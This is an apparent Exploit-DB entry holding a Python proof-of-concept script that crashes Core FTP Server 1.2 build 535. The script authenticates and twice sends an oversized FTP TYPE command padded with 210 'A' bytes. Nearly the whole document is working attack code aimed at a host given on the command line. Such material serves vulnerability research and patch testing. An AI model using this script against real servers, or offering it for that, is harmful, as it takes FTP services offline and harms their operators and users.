Core FTP Server 1.2 build 535 (32-bi)t - Crash (PoC)

EDB-ID:

33495

CVE:





Platform:

Windows

Date:

2014-05-24


#!/usr/bin/python

import socket,sys,time

def Usage():
        print ("Core FTP Server Version 1.2, build 535, 32-bit - Crash P.O.C.")
        print ("Usage: ./coreftp_dos.py <host> <port> <username> <password>")
        print ("Ex:    ./coreftp_dos.py 192.168.10.10 21 ftp ftp\n")

if len(sys.argv) <> 5:
        Usage()
        sys.exit(1)
else:
        host=sys.argv[1]
        port=sys.argv[2]
        user=sys.argv[3]
        passwd=sys.argv[4]
        evil = '\x41' * 210
        print "[+] Trying to crash Core FTP server with " + str(len(evil)) + " buffer bytes"
        print "[+] Host: " + host + " Port: " + port + " User: " + user + " Pass: " + passwd
        print "[+] Attempting to connect to the remote Core FTP Server..."
        first = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        port=int(port)
        try:
                connect = first.connect((host, port))
        except:
                print "[-] There was an error while trying to connect to the remote FTP Server"
                sys.exit(1)
        print "[+] Connection to remote server successfully... now trying to authenticate"
        first.recv(1024)
        first.send('USER ' + user + '\r\n')
        first.recv(1024)
        first.send('PASS ' + passwd + '\r\n')
        first.recv(1024)
        first.send('dir\r\n');
        first.send('TYPE ' + evil + '\r\n')
        try:
                first.recv(1024)
        except:
                print "[-] Couldn\'t authenticate in the remote FTP server"
                sys.exit(1)
        print "[+] First buffer was sent, waiting 30 seconds to send a second time with some more bad data..."
        first.close()
        second = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        time.sleep(30)
        try:
                connect = second.connect((host, port))
        except:
                print "[-] FTP Server isn\'t responding... it might had successfully crashed."
                sys.exit(1)
        second.send('USER ' + user + '\r\n')
        second.recv(1024)
        second.send('PASS ' + passwd + '\r\n')
        second.recv(1024)
        second.send('TYPE ' + evil + '\r\n')
        second.recv(1024)
        print "[+] By now, Core FTP Server should had crashed and will not accept new connections."
        second.close()
        sys.exit(0)